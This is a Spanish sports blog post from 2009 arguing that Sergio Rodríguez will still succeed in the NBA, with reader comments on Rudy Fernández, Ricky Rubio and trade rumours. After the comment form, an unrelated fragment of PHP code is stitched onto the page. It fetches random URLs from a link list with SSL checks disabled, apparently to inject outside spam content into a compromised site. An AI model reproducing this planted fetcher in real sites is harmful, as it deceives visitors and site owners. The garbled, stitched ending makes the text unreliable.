El Dilema de Sergio

18 de February de 2009 por TheDeerHunter

Pasan las horas y el tiempo juega a favor o en contra de Sergio, ya ni lo sabemos. Jueves la fecha límite.

Su nombre ha sonado en prácticamente todos los traspasos que se han rumoreado alrededor de los Blazers. Da la sensación que, en efecto, buscan moverse y dar impulso a un equipo que, bien tocado, podría dar grandes sustos este mismo curso en playoffs. El último rumor, los Bucks (¿¿para ser suplente de Sessions??) de Schiles. ¿No queríamos sopa?

Mucho se ha hablado de su caso. Opiniones de todo tipo, algunas de ellas bastante autorizadas. De si se fue muy joven, de que si McMillan lo maltrata, de que no cree ni creerá en él, de si es mejor o peor que Bayless y/o Blake, de si se trata de arma arrojadiza entre el GM y el entrenador, de que la NBA no lo es todo, de si se ha estancado, de que ha perdido su sitio en la selección, de la formación en Europa, de que si debería volver, de si debería irse a otro equipo, de lo vulgar que se ha vuelto su juego, de que no está hecho para esta liga… Casi todas, con cierta carga de razón. Algunas incluso, evidencias en sí mismas.

Soy de los que siguen creyendo en Sergio. De los que se resisten a admitir que en su caso está todo dicho y que está más que demostrado que toda su aventura ha sido un error, una pérdida de tiempo, una estupidez. Que no tiene tanto talento como algunos creíamos o que se ha desvirtuado con lo difícil de su situación. Que ha fracasado. Pero también he de confesar que cada vez me resulta más difícil apostar porque finalmente lo logrará o porque esté siguiendo el camino adecuado para él. Tal vez he estado todo este tiempo completamente equivocado, lo cual por otro lado, tampoco sería la primera vez, ni será la última.

Y a todo esto, Rudy se levantó la camiseta y debajo apareció, gloriosa, la palabra Martin que, aún sin acento, algunos conocimos al instante. Otros no. No voy a tratar de explicar qué tipo de sentimientos me transmitió ese inesperado gesto de Rudy. Supongo que a cada uno le inspiró de forma particular. Sí recordaré el tipo de ídolo que fue para muchos el malogrado Fernando Martín y que, siendo una figura internacional aquí en Europa, decidió, en contra de muchísimas opiniones, muchas de ellas también autorizadas, cruzar el charco y asumir un gran reto. Todo por unos escasos miserables minutos que jugó en Portland. Tras todos estos años no recordamos un fracaso. Recordamos el pionero, “El Conquistador”.

Soy consciente que poco o nada pueden compararse los casos de Fernando y de Sergio y menos aún las circunstancias que les han rodeado a ambos ni las conclusiones de su respectivas historias. Sin embargo, fue precisamente Fernando Martín, reencarnado en el ligero cuerpo de Rudy, quien me recordó porqué, pase lo que pase al final, seguiré apostando por Sergio, por su valor, su espíritu de trabajo, su lucha e inconformismo contra todo lo que parece evidente o establecido. Precísamente las virtudes de Fernando. No te rindas, Chacho.

Y con esta verborrea sin sentido os enumero los argumentos que sustentan mi opinión. Confío en que luego seáis capaces de rebatirlos o de enriquecerlos.

1. Tras mucho meditar me siento incapaz de discernir si hizo bien o mal marchándose tan joven. Creo que hay casos equivalentes para parar un tren que apoyan o rechazan esa teoría. Lo único seguro es que hay trenes que sólo pasan una vez en la vida. Ese era su sueño y tuvo las narices de asumir el reto con todas las consecuencias, como ya avisó públicamente. Él era consciente de que no iba a ser nada fácil y así lo dijo. El único argumento mínimamente de peso que podrá justificar esta afirmación será a toro pasado y en ningún caso concluyente. De momento, en el peor de los casos, habrá cumplido su sueño y se habrá llevado un pastizal bueno. Ya querríamos muchos ese peor de los casos para nosotros.

2. No creo en absoluto que sea peor jugador que cuando se fue. Creo firmemente que es bastante mejor, que el talento no se olvida y que con mucho trabajo, hasta McMillan llegó a reconocer que ha mejorado física, defensiva y tácticamente. Adicionalmente, creo que la mejor manera de progresar es partiéndote la cara con los mejores.

3. De momento, el mayor pecado que se le atribuye a Sergio como consecuencia directa de sus propios actos es hacer lo que se debe de hacer en cada momento. No olvidemos que tiene contrato con los Blazers, no como Navarro. Los Blazers no han mostrado interés público por traspasarlo o rescindirlo, como en el caso de Garbajosa. La posibilidad de decidirse por volver a Europa no parece tan trivial como la gente dice. Estoy en el más completo desacuerdo con algunas afirmaciones de insumisión con respecto a lo que le piden que haga en su equipo, por muy mal que me parezca lo que le piden. Estoy completamente seguro que eso supondría un suicidio deportivo, al menos en la NBA que es donde él quiere triunfar. Los americanos se las gastan buenas con ese tipo de cosas. Como es natural, por otro lado.

4. Sergio cuenta con juventud y talento. Además ha demostrado humildad, voluntad, capacidad de sacrificio e inteligencia. No me cabe ninguna duda que seguirá progresando mucho, en la NBA, aquí o donde su voluntad y sus circunstancias le lleven. El éxito siempre será relativo (que se lo digan a McGrady)

De momento eso es todo, no sé si me dejo algo en el tintero… A ver qué decís.

Comenta

7 comentarios a esta entrada

  1. toni dice:
    #1

    Nets o Knicks, eso es lo que pone en la mayoria de sitios, pero creo que finalmente seguiremos viendolo con rudy.
    Sergio es un grande, un jugon, de esos que nos hacen pasarlo bien, debería mejorar su defensa pero sigue siendo un fenomenal base y simplemente por eso creo que tiene sitio en la nba.
    Que pensais de Ricky?? – A mi me encanta pero tengo miedo a que le pase lo mismo que al chacho(poco físico, mejorable tiro de 3…) aunque ricky es mejor defensor (Todo jugador deberia ser discipulo de Aito) y tiene un saber estar en la pista impresionante, pero siempre queda la posiblidad de no cuaje.

    pd: En general, el allstar creo que fué el peor que he visto, faltaban los primos por allí haciendo el payasete, ya se les ha pasado el arroz o que?(Tmac operación rodilla y air viviendo de sus partidazos eventuales…)Que me decís?

      Citar

  2. TheDeerHunter dice:
    #2

    No sé, Toni… hay ciertas cosas con las que discrepo profundamente contigo.
    ¿poco físico Rudy?? ¿tiro exterior mejorable?? Lo del físico podría admitirlo en cuanto a su “ligereza” pero ha sido el primer extranjero en ir al concurso de mates, por delante de bestias pardas como Alexander, o Bayless… Con respecto al tiro, sencillamente no ha habido NADIE en toda la historia de la NBA (se dice pronto) que haya sido, hasta el momento, tirador más efectivo que él… aunque eso también resulta peligroso.

    Con respecto a tus comentarios de Sergio. En efecto… tiene que mejorar muchos aspectos. Defensa, tiro, control, eficacia… pero talento tiene a raudales y eso se tiene o no se tiene. Tiene mucho camino recorrido, siendo tan joven y sin embargo tiene experiencia… que ya soñarían otros ilustres con tenerla.
    En fin… que lo tiene todo a favor para triunfar… excepto una determinada ideosincrasia en el equipo en que se encuentra. Si me lo preguntan… me costaría decidir si es peor jugador que Chris Duhon y el panorama D’Antoni es atractivo para su estilo… pero dejar ahora a los Blazers en cierto modo es un paso atrás, sin duda.

    Por último… no creo que T-Mac esté acabado y sin ir mucho más lejos el año pasado se salió. Vince este año está haciendo la temporada más seria que le recuerdo… eso sí, ya nadie le toca más los cataplines con si es el heredero de Jordan o de Vicente padre.

      Citar

  3. MagicJohnson32 dice:
    #3

    Deer, Toni habla de Ricky Rubio, no de Rudy 😉

      Citar

  4. TheDeerHunter dice:
    #4

    ups… lapsus.
    perdona toni XD

      Citar

  5. kantonyo dice:
    #5

    yo parece que soy de los únicos que creen que Sergio ha mejorado en los Blazers. Nunca Sergio ha jugado tan bien al baloncesto como en los últimos meses. Y con McMillan ha aprendido a ser un jugador bastante eficaz, casi siempre lo hace bien, no arriesga pero falla muy pocas veces. Es verdad que eso ha restado su capacidad de sorprender y ha escondido su talento. Pero recordemos que solo tiene 22 años, y en este momento es títular en una de las mejores plantillas del oeste.

    Yo creo que su mejor opción es Porltand, aunque tampoco estaría mal irse a los Knicks, posiblemente el juego de D’antoni es el que más le conviene.

    No hay que ser pesimistas y tan plastas. Sergio hizo bastante bien de irse a la NBA, y para nada está fracasando. Con su edad le pueden quedar todavia 10 años a buen nivel en USA, así que fijaros la capacidad de progresión que puede tener.

    9,2 puntos y 4.2 asistencias por partido en los últimos 5 en 25 minutos de juego.

      Citar

  6. Jabho dice:
    #6

    Yo ya he dicho varias veces que si Sergio Rodríguez acaba triunfando será gracias a McMillan. A mi Sergio me parece que tiene buena visión de juego pero muy poco más. Debe mejorar la defensa y el físico. También el tiro pero además debe mejorar su toma de decisiones. A mi al principio me recordaba mucho a De la Peña, un jugador que siempre intenta el pase de hightlight… últimamente va mejorando y creo que es gracias a McMillan. Si aprende a tomar buenas decisiones en ataque, con eso y su visión serán menos importante sus defectos…

    Los que se quejan de trato que miran a Bayless y comparen.

    Gran artículo Deer. COmo conclusión no sé si Sergio triunfará. Soy mas escéptico que tu pero no lo descarto. Como dices tiene tiempo y de momento humildad. Si no le rayan la cabeza haciéndole creer que todo es culpa del resto del mundo y se esfuerza en mejorar ya va por buena camino…

      Citar

  7. kantonyo dice:
    #7

    de acuerdo en casi todo contigo Jabho, solo discrepo en una cosa, yo creo que Sergio ya ha triunfado, no olvidemos lo díficil que es que un jugador europeo con 22 años tenga su curriculum… la pregunta sería, Sergio está preparado para ser algún día un jugador referente en la NBA, como lo son Gasol y Calderón??

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>